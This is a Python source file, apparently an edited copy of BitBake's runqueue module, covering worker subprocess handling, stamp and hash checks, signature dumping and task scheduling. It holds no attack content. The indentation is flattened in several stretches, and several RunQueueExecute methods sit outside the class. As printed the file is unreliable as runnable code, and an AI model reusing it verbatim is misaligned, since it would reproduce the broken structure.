# Create and print to the logs a virtual/xxxx -> PN (fn) table
for mc in taskData:
virtmap = taskData[mc].get_providermap(prefix="virtual/")
virtpnmap = {}
for v in virtmap:
virtpnmap[v] = self.dataCaches[mc].pkg_fn[virtmap[v]]
bb.debug(2, "%s resolved to: %s (%s)" % (v, virtpnmap[v], virtmap[v]))
if hasattr(bb.parse.siggen, "tasks_resolved"):
bb.parse.siggen.tasks_resolved(virtmap, virtpnmap, self.dataCaches[mc])
self.init_progress_reporter.next_stage()
bb.parse.siggen.set_setscene_tasks(self.runq_setscene_tids)
# Iterate over the task list and call into the siggen code
dealtwith = set()
todeal = set(self.runtaskentries)
while len(todeal) > 0:
for tid in todeal.copy():
if len(self.runtaskentries[tid].depends - dealtwith) == 0:
dealtwith.add(tid)
todeal.remove(tid)
self.prepare_task_hash(tid)
bb.parse.siggen.writeout_file_checksum_cache()
#self.dump_data()
return len(self.runtaskentries)
def prepare_task_hash(self, tid):
dc = bb.parse.siggen.get_data_caches(self.dataCaches, mc_from_tid(tid))
bb.parse.siggen.prep_taskhash(tid, self.runtaskentries[tid].depends, dc)
self.runtaskentries[tid].hash = bb.parse.siggen.get_taskhash(tid, self.runtaskentries[tid].depends, dc)
self.runtaskentries[tid].unihash = bb.parse.siggen.get_unihash(tid)
def dump_data(self):
"""
Dump some debug information on the internal data structures
"""
logger.debug(3, "run_tasks:")
for tid in self.runtaskentries:
logger.debug(3, " %s: %s Deps %s RevDeps %s", tid,
self.runtaskentries[tid].weight,
self.runtaskentries[tid].depends,
self.runtaskentries[tid].revdeps)
class RunQueueWorker():
    """
    Container pairing a bitbake-worker subprocess with the pipe used to
    communicate with it.
    """
    def __init__(self, process, pipe):
        # process: the worker subprocess handle (has .stdin/.returncode/.poll())
        # pipe: the runQueuePipe wrapping the worker's stdout
        self.process = process
        self.pipe = pipe

    def __repr__(self):
        # Aid debugging/log inspection: show what this worker wraps.
        return "%s(%r, %r)" % (type(self).__name__, self.process, self.pipe)
class RunQueue:
    """
    Drive execution of the task graph prepared by RunQueueData.

    Owns the bitbake-worker subprocesses (regular and fakeroot variants, one
    per multiconfig), the disk-space monitor hook, and the state machine that
    execute_runqueue() steps through (prepare -> scene init -> running ->
    cleanup -> complete/failed).
    """
    def __init__(self, cooker, cfgData, dataCaches, taskData, targets):
        self.cooker = cooker
        self.cfgData = cfgData
        self.rqdata = RunQueueData(self, cooker, cfgData, dataCaches, taskData, targets)

        # Policy/hook knobs read once from configuration.
        self.stamppolicy = cfgData.getVar("BB_STAMP_POLICY") or "perfile"
        self.hashvalidate = cfgData.getVar("BB_HASHCHECK_FUNCTION") or None
        self.depvalidate = cfgData.getVar("BB_SETSCENE_DEPVALID") or None

        self.state = runQueuePrepare

        # For disk space monitor
        # Invoked at regular time intervals via the bitbake heartbeat event
        # while the build is running. We generate a unique name for the handler
        # here, just in case that there ever is more than one RunQueue instance,
        # start the handler when reaching runQueueSceneInit, and stop it when
        # done with the build.
        self.dm = monitordisk.diskMonitor(cfgData)
        self.dm_event_handler_name = '_bb_diskmonitor_' + str(id(self))
        self.dm_event_handler_registered = False
        self.rqexe = None
        # Worker pools keyed by multiconfig name.
        self.worker = {}
        self.fakeworker = {}

    def _start_worker(self, mc, fakeroot = False, rqexec = None):
        """
        Spawn a bitbake-worker subprocess for multiconfig *mc* and send it the
        cooker configuration and per-multiconfig worker data over stdin.
        Returns a RunQueueWorker wrapping the process and its read pipe.
        """
        logger.debug(1, "Starting bitbake-worker")
        # The magic token encodes the worker mode (profiling and/or fakeroot).
        magic = "decafbad"
        if self.cooker.configuration.profile:
            magic = "decafbadbad"
        if fakeroot:
            magic = magic + "beef"
            mcdata = self.cooker.databuilder.mcdata[mc]
            fakerootcmd = shlex.split(mcdata.getVar("FAKEROOTCMD"))
            fakerootenv = (mcdata.getVar("FAKEROOTBASEENV") or "").split()
            env = os.environ.copy()
            # Split on the first '=' only: environment values may themselves
            # contain '=' (a plain split() raised ValueError on unpacking).
            for key, value in (var.split('=', 1) for var in fakerootenv):
                env[key] = value
            worker = subprocess.Popen(fakerootcmd + ["bitbake-worker", magic], stdout=subprocess.PIPE, stdin=subprocess.PIPE, env=env)
        else:
            worker = subprocess.Popen(["bitbake-worker", magic], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
        bb.utils.nonblockingfd(worker.stdout)
        workerpipe = runQueuePipe(worker.stdout, None, self.cfgData, self, rqexec)

        workerdata = {
            "taskdeps" : self.rqdata.dataCaches[mc].task_deps,
            "fakerootenv" : self.rqdata.dataCaches[mc].fakerootenv,
            "fakerootdirs" : self.rqdata.dataCaches[mc].fakerootdirs,
            "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv,
            "sigdata" : bb.parse.siggen.get_taskdata(),
            "logdefaultlevel" : bb.msg.loggerDefaultLogLevel,
            "logdefaultverbose" : bb.msg.loggerDefaultVerbose,
            "logdefaultverboselogs" : bb.msg.loggerVerboseLogs,
            "logdefaultdomain" : bb.msg.loggerDefaultDomains,
            "prhost" : self.cooker.prhost,
            "buildname" : self.cfgData.getVar("BUILDNAME"),
            "date" : self.cfgData.getVar("DATE"),
            "time" : self.cfgData.getVar("TIME"),
            "hashservaddr" : self.cooker.hashservaddr,
        }

        # Handshake: the worker parses these tagged pickled blobs from stdin.
        worker.stdin.write(b"<cookerconfig>" + pickle.dumps(self.cooker.configuration) + b"</cookerconfig>")
        worker.stdin.write(b"<extraconfigdata>" + pickle.dumps(self.cooker.extraconfigdata) + b"</extraconfigdata>")
        worker.stdin.write(b"<workerdata>" + pickle.dumps(workerdata) + b"</workerdata>")
        worker.stdin.flush()

        return RunQueueWorker(worker, workerpipe)

    def _teardown_worker(self, worker):
        """Ask *worker* to quit, drain its pipe, and wait for it to exit."""
        if not worker:
            return
        logger.debug(1, "Teardown for bitbake-worker")
        try:
            worker.process.stdin.write(b"<quit></quit>")
            worker.process.stdin.flush()
            worker.process.stdin.close()
        except IOError:
            # The worker may have died already and closed its end.
            pass
        # Keep reading the pipe so the worker can flush its output and exit.
        while worker.process.returncode is None:
            worker.pipe.read()
            worker.process.poll()
        while worker.pipe.read():
            continue
        worker.pipe.close()

    def start_worker(self):
        """Start one worker per multiconfig, tearing down any existing ones."""
        if self.worker:
            self.teardown_workers()
        self.teardown = False
        for mc in self.rqdata.dataCaches:
            self.worker[mc] = self._start_worker(mc)

    def start_fakeworker(self, rqexec, mc):
        """Lazily start the fakeroot worker for *mc* (idempotent)."""
        if mc not in self.fakeworker:
            self.fakeworker[mc] = self._start_worker(mc, True, rqexec)

    def teardown_workers(self):
        """Shut down all regular and fakeroot workers."""
        self.teardown = True
        for mc in self.worker:
            self._teardown_worker(self.worker[mc])
        self.worker = {}
        for mc in self.fakeworker:
            self._teardown_worker(self.fakeworker[mc])
        self.fakeworker = {}

    def read_workers(self):
        """Drain any pending output from all worker pipes."""
        for mc in self.worker:
            self.worker[mc].pipe.read()
        for mc in self.fakeworker:
            self.fakeworker[mc].pipe.read()

    def active_fds(self):
        """Return all worker pipe fds, for select()-style waiting."""
        fds = []
        for mc in self.worker:
            fds.append(self.worker[mc].pipe.input)
        for mc in self.fakeworker:
            fds.append(self.fakeworker[mc].pipe.input)
        return fds

    def check_stamp_task(self, tid, taskname = None, recurse = False, cache = None):
        """
        Return True if the stamp for *tid* is current, i.e. the task does not
        need to re-run. Considers the stamp policy, nostamp/setscene tasks and
        the mtimes of dependency stamps; with recurse=True the check walks the
        dependency tree, memoising results in *cache*.
        """
        def get_timestamp(f):
            # Return the stamp mtime, or None if the file is absent/unreadable.
            try:
                if not os.access(f, os.F_OK):
                    return None
                return os.stat(f)[stat.ST_MTIME]
            except OSError:
                # Was a bare except; only filesystem errors can occur here.
                return None

        (mc, fn, tn, taskfn) = split_tid_mcfn(tid)
        if taskname is None:
            taskname = tn

        if self.stamppolicy == "perfile":
            fulldeptree = False
        else:
            fulldeptree = True
            stampwhitelist = []
            if self.stamppolicy == "whitelist":
                stampwhitelist = self.rqdata.stampfnwhitelist[mc]

        stampfile = bb.build.stampfile(taskname, self.rqdata.dataCaches[mc], taskfn)

        # If the stamp is missing, it's not current
        if not os.access(stampfile, os.F_OK):
            logger.debug(2, "Stampfile %s not available", stampfile)
            return False
        # If it's a 'nostamp' task, it's not current
        taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]
        if 'nostamp' in taskdep and taskname in taskdep['nostamp']:
            logger.debug(2, "%s.%s is nostamp\n", fn, taskname)
            return False

        # Setscene tasks with an existing stamp are always current.
        if taskname != "do_setscene" and taskname.endswith("_setscene"):
            return True

        if cache is None:
            cache = {}

        iscurrent = True
        t1 = get_timestamp(stampfile)
        for dep in self.rqdata.runtaskentries[tid].depends:
            if iscurrent:
                (mc2, fn2, taskname2, taskfn2) = split_tid_mcfn(dep)
                stampfile2 = bb.build.stampfile(taskname2, self.rqdata.dataCaches[mc2], taskfn2)
                stampfile3 = bb.build.stampfile(taskname2 + "_setscene", self.rqdata.dataCaches[mc2], taskfn2)
                t2 = get_timestamp(stampfile2)
                t3 = get_timestamp(stampfile3)
                # A newer (or lone) setscene stamp satisfies the dependency.
                if t3 and not t2:
                    continue
                if t3 and t3 > t2:
                    continue
                if fn == fn2 or (fulldeptree and fn2 not in stampwhitelist):
                    if not t2:
                        logger.debug(2, 'Stampfile %s does not exist', stampfile2)
                        iscurrent = False
                        break
                    if t1 < t2:
                        logger.debug(2, 'Stampfile %s < %s', stampfile, stampfile2)
                        iscurrent = False
                        break
                if recurse and iscurrent:
                    if dep in cache:
                        iscurrent = cache[dep]
                        if not iscurrent:
                            logger.debug(2, 'Stampfile for dependency %s:%s invalid (cached)' % (fn2, taskname2))
                    else:
                        iscurrent = self.check_stamp_task(dep, recurse=True, cache=cache)
                        cache[dep] = iscurrent
        if recurse:
            cache[tid] = iscurrent
        return iscurrent

    def validate_hashes(self, tocheck, data, currentcount=0, siginfo=False, summary=True):
        """
        Ask the configured BB_HASHCHECK_FUNCTION which of the tids in
        *tocheck* can be fulfilled from (shared) state. Returns the set of
        valid tids; an empty set when no hash check function is configured.
        """
        valid = set()
        if self.hashvalidate:
            sq_data = {}
            sq_data['hash'] = {}
            sq_data['hashfn'] = {}
            sq_data['unihash'] = {}
            for tid in tocheck:
                (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
                sq_data['hash'][tid] = self.rqdata.runtaskentries[tid].hash
                sq_data['hashfn'][tid] = self.rqdata.dataCaches[mc].hashfn[taskfn]
                sq_data['unihash'][tid] = self.rqdata.runtaskentries[tid].unihash

            valid = self.validate_hash(sq_data, data, siginfo, currentcount, summary)

        return valid

    def validate_hash(self, sq_data, d, siginfo, currentcount, summary):
        """Evaluate the configured hash check function with the given data."""
        locs = {"sq_data" : sq_data, "d" : d, "siginfo" : siginfo, "currentcount" : currentcount, "summary" : summary}

        # Metadata has **kwargs so args can be added, sq_data can also gain new fields
        call = self.hashvalidate + "(sq_data, d, siginfo=siginfo, currentcount=currentcount, summary=summary)"

        return bb.utils.better_eval(call, locs)

    def _execute_runqueue(self):
        """
        Run the tasks in a queue prepared by rqdata.prepare()
        Upon failure, optionally try to recover the build using any alternate providers
        (if the abort on failure configuration option isn't set)
        """
        retval = True

        if self.state is runQueuePrepare:
            # NOTE: if you add, remove or significantly refactor the stages of this
            # process then you should recalculate the weightings here. This is quite
            # easy to do - just change the next line temporarily to pass debug=True as
            # the last parameter and you'll get a printout of the weightings as well
            # as a map to the lines where next_stage() was called. Of course this isn't
            # critical, but it helps to keep the progress reporting accurate.
            self.rqdata.init_progress_reporter = bb.progress.MultiStageProcessProgressReporter(self.cooker.data,
                                                            "Initialising tasks",
                                                            [43, 967, 4, 3, 1, 5, 3, 7, 13, 1, 2, 1, 1, 246, 35, 1, 38, 1, 35, 2, 338, 204, 142, 3, 3, 37, 244])
            if self.rqdata.prepare() == 0:
                self.state = runQueueComplete
            else:
                self.state = runQueueSceneInit
                bb.parse.siggen.save_unitaskhashes()

        if self.state is runQueueSceneInit:
            self.rqdata.init_progress_reporter.next_stage()

            # we are ready to run,  emit dependency info to any UI or class which
            # needs it
            depgraph = self.cooker.buildDependTree(self, self.rqdata.taskData)
            self.rqdata.init_progress_reporter.next_stage()
            bb.event.fire(bb.event.DepTreeGenerated(depgraph), self.cooker.data)

            if not self.dm_event_handler_registered:
                # (Previously bound to an unused 'res' variable.)
                bb.event.register(self.dm_event_handler_name,
                                  lambda x: self.dm.check(self) if self.state in [runQueueRunning, runQueueCleanUp] else False,
                                  ('bb.event.HeartbeatEvent',))
                self.dm_event_handler_registered = True

            dump = self.cooker.configuration.dump_signatures
            if dump:
                self.rqdata.init_progress_reporter.finish()
                if 'printdiff' in dump:
                    invalidtasks = self.print_diffscenetasks()
                self.dump_signatures(dump)
                if 'printdiff' in dump:
                    self.write_diffscenetasks(invalidtasks)
                self.state = runQueueComplete

        if self.state is runQueueSceneInit:
            self.rqdata.init_progress_reporter.next_stage()
            self.start_worker()
            self.rqdata.init_progress_reporter.next_stage()
            self.rqexe = RunQueueExecute(self)

            # If we don't have any setscene functions, skip execution
            if len(self.rqdata.runq_setscene_tids) == 0:
                logger.info('No setscene tasks')
                for tid in self.rqdata.runtaskentries:
                    if len(self.rqdata.runtaskentries[tid].depends) == 0:
                        self.rqexe.setbuildable(tid)
                    self.rqexe.tasks_notcovered.add(tid)
                self.rqexe.sqdone = True
            logger.info('Executing Tasks')
            self.state = runQueueRunning

        if self.state is runQueueRunning:
            retval = self.rqexe.execute()

        if self.state is runQueueCleanUp:
            retval = self.rqexe.finish()

        build_done = self.state is runQueueComplete or self.state is runQueueFailed

        if build_done and self.dm_event_handler_registered:
            bb.event.remove(self.dm_event_handler_name, None)
            self.dm_event_handler_registered = False

        if build_done and self.rqexe:
            bb.parse.siggen.save_unitaskhashes()
            self.teardown_workers()
            # (A redundant nested 'if self.rqexe:' check was removed here.)
            if self.rqexe.stats.failed:
                logger.info("Tasks Summary: Attempted %d tasks of which %d didn't need to be rerun and %d failed.", self.rqexe.stats.completed + self.rqexe.stats.failed, self.rqexe.stats.skipped, self.rqexe.stats.failed)
            else:
                # Let's avoid the word "failed" if nothing actually did
                logger.info("Tasks Summary: Attempted %d tasks of which %d didn't need to be rerun and all succeeded.", self.rqexe.stats.completed, self.rqexe.stats.skipped)

        if self.state is runQueueFailed:
            raise bb.runqueue.TaskFailure(self.rqexe.failed_tids)

        if self.state is runQueueComplete:
            # All done
            return False

        # Loop
        return retval

    def execute_runqueue(self):
        """
        Step the runqueue state machine once; see _execute_runqueue().
        Catch unexpected exceptions and ensure we exit when an error occurs,
        not loop.
        """
        try:
            return self._execute_runqueue()
        except bb.runqueue.TaskFailure:
            raise
        except SystemExit:
            raise
        except bb.BBHandledException:
            # Best-effort teardown: don't let cleanup errors mask the original
            # exception. (Was a bare except:, which also swallowed
            # KeyboardInterrupt/SystemExit.)
            try:
                self.teardown_workers()
            except Exception:
                pass
            self.state = runQueueComplete
            raise
        except Exception:
            logger.exception("An uncaught exception occurred in runqueue")
            try:
                self.teardown_workers()
            except Exception:
                pass
            self.state = runQueueComplete
            raise

    def finish_runqueue(self, now = False):
        """Stop the queue: immediately when *now* is True, else gracefully."""
        if not self.rqexe:
            self.state = runQueueComplete
            return

        if now:
            self.rqexe.finish_now()
        else:
            self.rqexe.finish()

    def rq_dump_sigfn(self, fn, options):
        """Reparse recipe *fn* and dump its signature information."""
        bb_cache = bb.cache.NoCache(self.cooker.databuilder)
        mc = bb.runqueue.mc_from_tid(fn)
        # loadDataFull is called for its parsing side effects; the returned
        # datastore is not used directly here.
        the_data = bb_cache.loadDataFull(fn, self.cooker.collections[mc].get_file_appends(fn))
        siggen = bb.parse.siggen
        dataCaches = self.rqdata.dataCaches
        siggen.dump_sigfn(fn, dataCaches, options)

    def dump_signatures(self, options):
        """
        Reparse every recipe in the runqueue in a bounded pool of
        subprocesses and dump signature data for all of them.
        """
        fns = set()
        bb.note("Reparsing files to collect dependency data")

        for tid in self.rqdata.runtaskentries:
            fn = fn_from_tid(tid)
            fns.add(fn)

        max_process = int(self.cfgData.getVar("BB_NUMBER_PARSE_THREADS") or os.cpu_count() or 1)
        # We cannot use the real multiprocessing.Pool easily due to some local data
        # that can't be pickled. This is a cheap multi-process solution.
        launched = []
        while fns:
            if len(launched) < max_process:
                p = Process(target=self.rq_dump_sigfn, args=(fns.pop(), options))
                p.start()
                launched.append(p)
            # Iterate a copy: removing from the list while iterating it skips
            # the element after each removal and delayed reaping of workers.
            for q in list(launched):
                # The finished processes are joined when calling is_alive()
                if not q.is_alive():
                    launched.remove(q)
        for p in launched:
            p.join()

        bb.parse.siggen.dump_sigs(self.rqdata.dataCaches, options)

        return

    def print_diffscenetasks(self):
        """
        Determine which tasks cannot be fulfilled from the cache and print
        the tasks where the difference from cached state begins. Returns the
        set of those "root" invalid tasks.
        """
        noexec = []
        tocheck = set()

        for tid in self.rqdata.runtaskentries:
            (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
            taskdep = self.rqdata.dataCaches[mc].task_deps[taskfn]

            if 'noexec' in taskdep and taskname in taskdep['noexec']:
                noexec.append(tid)
                continue

            tocheck.add(tid)

        valid_new = self.validate_hashes(tocheck, self.cooker.data, 0, True, summary=False)

        # Tasks which are both setscene and noexec never care about dependencies
        # We therefore find tasks which are setscene and noexec and mark their
        # unique dependencies as valid.
        for tid in noexec:
            if tid not in self.rqdata.runq_setscene_tids:
                continue
            for dep in self.rqdata.runtaskentries[tid].depends:
                hasnoexecparents = True
                for dep2 in self.rqdata.runtaskentries[dep].revdeps:
                    if dep2 in self.rqdata.runq_setscene_tids and dep2 in noexec:
                        continue
                    hasnoexecparents = False
                    break
                if hasnoexecparents:
                    valid_new.add(dep)

        invalidtasks = set()
        for tid in self.rqdata.runtaskentries:
            if tid not in valid_new and tid not in noexec:
                invalidtasks.add(tid)

        # Breadth-first walk: a tid whose dependency is also invalid is not a
        # "root" of the difference, so collect it into 'found'.
        found = set()
        processed = set()
        for tid in invalidtasks:
            toprocess = set([tid])
            while toprocess:
                # (renamed from 'next' to avoid shadowing the builtin)
                pending = set()
                for t in toprocess:
                    for dep in self.rqdata.runtaskentries[t].depends:
                        if dep in invalidtasks:
                            found.add(tid)
                        if dep not in processed:
                            processed.add(dep)
                            pending.add(dep)
                toprocess = pending
                if tid in found:
                    toprocess = set()

        tasklist = []
        for tid in invalidtasks.difference(found):
            tasklist.append(tid)

        if tasklist:
            bb.plain("The differences between the current build and any cached tasks start at the following tasks:\n" + "\n".join(tasklist))

        return invalidtasks.difference(found)

    def write_diffscenetasks(self, invalidtasks):
        """
        For each invalid task, locate the closest previously written sigdata
        file and print a human-readable diff explaining the cache miss.
        """

        # Define recursion callback
        def recursecb(key, hash1, hash2):
            hashes = [hash1, hash2]
            hashfiles = bb.siggen.find_siginfo(key, None, hashes, self.cfgData)

            recout = []
            if len(hashfiles) == 2:
                out2 = bb.siggen.compare_sigfiles(hashfiles[hash1], hashfiles[hash2], recursecb)
                recout.extend(list(' ' + l for l in out2))
            else:
                recout.append("Unable to find matching sigdata for %s with hashes %s or %s" % (key, hash1, hash2))

            return recout

        for tid in invalidtasks:
            (mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
            pn = self.rqdata.dataCaches[mc].pkg_fn[taskfn]
            h = self.rqdata.runtaskentries[tid].hash
            matches = bb.siggen.find_siginfo(pn, taskname, [], self.cfgData)
            match = None
            for m in matches:
                if h in m:
                    match = m
            if match is None:
                bb.fatal("Can't find a task we're supposed to have written out? (hash: %s)?" % h)
            # Drop the current hash's own file; the rest are candidates.
            matches = {k : v for k, v in iter(matches.items()) if h not in k}
            if matches:
                latestmatch = sorted(matches.keys(), key=lambda f: matches[f])[-1]
                prevh = __find_sha256__.search(latestmatch).group(0)
                output = bb.siggen.compare_sigfiles(latestmatch, match, recursecb)
                bb.plain("\nTask %s:%s couldn't be used from the cache because:\n We need hash %s, closest matching task was %s\n " % (pn, taskname, h, prevh) + '\n '.join(output))
class RunQueueExecute:
    def __init__(self, rq):
        """Set up execution state for the RunQueue *rq* and build the scenequeue data."""
        self.rq = rq
        self.cooker = rq.cooker
        self.cfgData = rq.cfgData
        self.rqdata = rq.rqdata

        # Concurrency limit and scheduler selection from configuration.
        self.number_tasks = int(self.cfgData.getVar("BB_NUMBER_THREADS") or 1)
        self.scheduler = self.cfgData.getVar("BB_SCHEDULER") or "speed"

        # Setscene (sq_*) task state sets.
        self.sq_buildable = set()
        self.sq_running = set()
        self.sq_live = set()

        self.updated_taskhash_queue = []
        self.pending_migrations = set()

        # Real task state sets.
        self.runq_buildable = set()
        self.runq_running = set()
        self.runq_complete = set()
        self.runq_tasksrun = set()

        self.build_stamps = {}
        self.build_stamps2 = []
        self.failed_tids = []
        self.sq_deferred = {}

        self.stampcache = {}

        self.holdoff_tasks = set()
        self.holdoff_need_update = True
        self.sqdone = False

        self.stats = RunQueueStats(len(self.rqdata.runtaskentries))
        self.sq_stats = RunQueueStats(len(self.rqdata.runq_setscene_tids))

        # Point existing worker pipes back at this executor.
        for mc in rq.worker:
            rq.worker[mc].pipe.setrunqueueexec(self)
        for mc in rq.fakeworker:
            rq.fakeworker[mc].pipe.setrunqueueexec(self)

        if self.number_tasks <= 0:
            bb.fatal("Invalid BB_NUMBER_THREADS %s" % self.number_tasks)

        # List of setscene tasks which we've covered
        self.scenequeue_covered = set()
        # List of tasks which are covered (including setscene ones)
        self.tasks_covered = set()
        self.tasks_scenequeue_done = set()
        self.scenequeue_notcovered = set()
        self.tasks_notcovered = set()
        self.scenequeue_notneeded = set()

        # We can't skip specified target tasks which aren't setscene tasks
        self.cantskip = set(self.rqdata.target_tids)
        self.cantskip.difference_update(self.rqdata.runq_setscene_tids)
        self.cantskip.intersection_update(self.rqdata.runtaskentries)

        # Select the scheduler class matching BB_SCHEDULER by name; the
        # for/else fires bb.fatal only when no match was found (no break).
        schedulers = self.get_schedulers()
        for scheduler in schedulers:
            if self.scheduler == scheduler.name:
                self.sched = scheduler(self, self.rqdata)
                logger.debug(1, "Using runqueue scheduler '%s'", scheduler.name)
                break
        else:
            bb.fatal("Invalid scheduler '%s'. Available schedulers: %s" %
                     (self.scheduler, ", ".join(obj.name for obj in schedulers)))

        #if len(self.rqdata.runq_setscene_tids) > 0:
        self.sqdata = SQData()
        build_scenequeue_data(self.sqdata, self.rqdata, self.rq, self.cooker, self.stampcache, self)
def runqueue_process_waitpid(self, task, status):
# self.build_stamps[pid] may not exist when use shared work directory.
if task in self.build_stamps:
self.build_stamps2.remove(self.build_stamps[task])
del self.build_stamps[task]
if task in self.sq_live:
if status != 0:
self.sq_task_fail(task, status)
else:
self.sq_task_complete(task)
self.sq_live.remove(task)
else:
if status != 0:
self.task_fail(task, status)
else:
self.task_complete(task)
return True
def finish_now(self):
for mc in self.rq.worker:
try:
self.rq.worker[mc].process.stdin.write(b"<finishnow></finishnow>")
self.rq.worker[mc].process.stdin.flush()
except IOError:
# worker must have died?
pass
for mc in self.rq.fakeworker:
try:
self.rq.fakeworker[mc].process.stdin.write(b"<finishnow></finishnow>")
self.rq.fakeworker[mc].process.stdin.flush()
except IOError:
# worker must have died?
pass
if len(self.failed_tids) != 0:
self.rq.state = runQueueFailed
return
self.rq.state = runQueueComplete
return
def finish(self):
    """
    Begin a clean shutdown of the runqueue.

    While task processes are still running this reports progress and
    returns the active worker fds so the caller keeps polling; once
    everything has drained it settles the final state and returns True.
    """
    self.rq.state = runQueueCleanUp

    remaining = self.stats.active + self.sq_stats.active
    if remaining > 0:
        bb.event.fire(runQueueExitWait(remaining), self.cfgData)
        self.rq.read_workers()
        return self.rq.active_fds()

    self.rq.state = runQueueFailed if self.failed_tids else runQueueComplete
    return True
# Used by setscene only
def check_dependencies(self, task, taskdeps):
    """
    Evaluate the configured depvalidate function over *task* plus its
    setscene dependencies and return its verdict. Returns False when no
    depvalidate hook is configured.
    """
    if not self.rq.depvalidate:
        return False

    # Work on a copy so the caller's dependency set is never mutated.
    deps = set(taskdeps)
    deps.add(task)
    taskdata = {}
    for dep in deps:
        (mc, fn, taskname, taskfn) = split_tid_mcfn(dep)
        taskdata[dep] = [self.rqdata.dataCaches[mc].pkg_fn[taskfn], taskname, fn]

    call = self.rq.depvalidate + "(task, taskdata, notneeded, d)"
    locs = {
        "task": task,
        "taskdata": taskdata,
        "notneeded": self.scenequeue_notneeded,
        "d": self.cooker.data,
    }
    return bb.utils.better_eval(call, locs)
def can_start_task(self):
    """Return True if another task may start under the active-task limit."""
    return (self.stats.active + self.sq_stats.active) < self.number_tasks
def get_schedulers(self):
    """
    Collect the available scheduler classes.

    Takes every RunQueueScheduler subclass defined in this module, then
    adds any dotted names the user listed in BB_SCHEDULERS. A bad import
    is fatal; a name without a dot is ignored with a note.
    """
    schedulers = {obj for obj in globals().values()
                  if type(obj) is type and issubclass(obj, RunQueueScheduler)}

    user_schedulers = self.cfgData.getVar("BB_SCHEDULERS")
    if user_schedulers:
        for sched in user_schedulers.split():
            if "." not in sched:
                bb.note("Ignoring scheduler '%s' from BB_SCHEDULERS: not an import" % sched)
                continue

            modname, name = sched.rsplit(".", 1)
            try:
                module = __import__(modname, fromlist=(name,))
            except ImportError as exc:
                logger.critical("Unable to import scheduler '%s' from '%s': %s" % (name, modname, exc))
                raise SystemExit(1)
            else:
                schedulers.add(getattr(module, name))
    return schedulers
def setbuildable(self, task):
    """Mark *task* as ready to run and notify the scheduler of it."""
    self.runq_buildable.add(task)
    self.sched.newbuildable(task)
def task_completeoutright(self, task):
    """
    Mark a task as completed.

    Then promote every reverse dependency whose dependencies are now all
    complete to the buildable set.
    """
    self.runq_complete.add(task)
    for revdep in self.rqdata.runtaskentries[task].revdeps:
        if revdep in self.runq_running or revdep in self.runq_buildable:
            continue
        deps = self.rqdata.runtaskentries[revdep].depends
        if all(dep in self.runq_complete for dep in deps):
            self.setbuildable(revdep)
            logger.debug(1, "Marking task %s as buildable", revdep)
def task_complete(self, task):
    """Handle successful completion of a real (non-setscene) task."""
    self.stats.taskCompleted()
    event = runQueueTaskCompleted(task, self.stats, self.rq)
    bb.event.fire(event, self.cfgData)
    self.task_completeoutright(task)
    self.runq_tasksrun.add(task)
def task_fail(self, task, exitcode):
    """
    Called when a task has failed.

    Records the failure in the state engine and, if the abort policy is
    enabled, starts cleaning up the runqueue.
    """
    self.stats.taskFailed()
    self.failed_tids.append(task)
    event = runQueueTaskFailed(task, self.stats, exitcode, self.rq)
    bb.event.fire(event, self.cfgData)
    if self.rqdata.taskData[''].abort:
        self.rq.state = runQueueCleanUp
def task_skip(self, task, reason):
    """Skip *task* for *reason*, completing it without execution."""
    self.runq_running.add(task)
    self.setbuildable(task)
    event = runQueueTaskSkipped(task, self.stats, self.rq, reason)
    bb.event.fire(event, self.cfgData)
    self.task_completeoutright(task)
    self.stats.taskSkipped()
    self.stats.taskCompleted()
def summarise_scenequeue_errors(self):
    """
    Cross-check scenequeue bookkeeping once the setscene phase winds
    down, logging anything inconsistent. Returns True if any error was
    detected.
    """
    err = False
    if not self.sqdone:
        logger.debug(1, 'We could skip tasks %s', "\n".join(sorted(self.scenequeue_covered)))
        bb.event.fire(sceneQueueComplete(self.sq_stats, self.rq), self.cfgData)

    # Leftover queue state means the setscene phase did not converge.
    for leftovers, what in ((self.sq_deferred, "deferred entries"),
                            (self.updated_taskhash_queue, "unprocessed changed taskhash entries"),
                            (self.holdoff_tasks, "holdoff tasks")):
        if leftovers:
            logger.error("Scenequeue had %s: %s" % (what, pprint.pformat(leftovers)))
            err = True

    for tid in self.rqdata.runq_setscene_tids:
        if tid not in self.scenequeue_covered and tid not in self.scenequeue_notcovered:
            err = True
            logger.error("Setscene Task %s was never marked as covered or not covered" % tid)
        if tid not in self.sq_buildable:
            err = True
            logger.error("Setscene Task %s was never marked as buildable" % tid)
        if tid not in self.sq_running:
            err = True
            logger.error("Setscene Task %s was never marked as running" % tid)

    for x in self.rqdata.runtaskentries:
        if x not in self.tasks_covered and x not in self.tasks_notcovered:
            logger.error("Task %s was never moved from the setscene queue" % x)
            err = True
        if x not in self.tasks_scenequeue_done:
            logger.error("Task %s was never processed by the setscene code" % x)
            err = True
        if not self.rqdata.runtaskentries[x].depends and x not in self.runq_buildable:
            logger.error("Task %s was never marked as buildable by the setscene code" % x)
            err = True
    return err
def execute(self):
    """
    Run the tasks in a queue prepared by prepare_runqueue.

    This is the main scheduling step, invoked repeatedly by the runqueue
    state machine. Each call makes at most one dispatch decision —
    start/skip one setscene task, start/skip one real task, or conclude
    the queue — then returns True (call again) or the worker fds to
    poll on while tasks are in flight.
    """
    self.rq.read_workers()
    # Apply any pending unihash changes before choosing work.
    if self.updated_taskhash_queue or self.pending_migrations:
        self.process_possible_migrations()

    if not hasattr(self, "sorted_setscene_tids"):
        # Don't want to sort this set every execution
        self.sorted_setscene_tids = sorted(self.rqdata.runq_setscene_tids)

    task = None
    if not self.sqdone and self.can_start_task():
        # Find the next setscene to run
        for nexttask in self.sorted_setscene_tids:
            if nexttask in self.sq_buildable and nexttask not in self.sq_running and self.sqdata.stamps[nexttask] not in self.build_stamps.values():
                # A setscene task whose reverse deps are all covered and
                # which isn't an explicit target can be skipped outright.
                if nexttask not in self.sqdata.unskippable and len(self.sqdata.sq_revdeps[nexttask]) > 0 and self.sqdata.sq_revdeps[nexttask].issubset(self.scenequeue_covered) and self.check_dependencies(nexttask, self.sqdata.sq_revdeps[nexttask]):
                    if nexttask not in self.rqdata.target_tids:
                        logger.debug(2, "Skipping setscene for task %s" % nexttask)
                        self.sq_task_skip(nexttask)
                        self.scenequeue_notneeded.add(nexttask)
                        if nexttask in self.sq_deferred:
                            del self.sq_deferred[nexttask]
                        return True
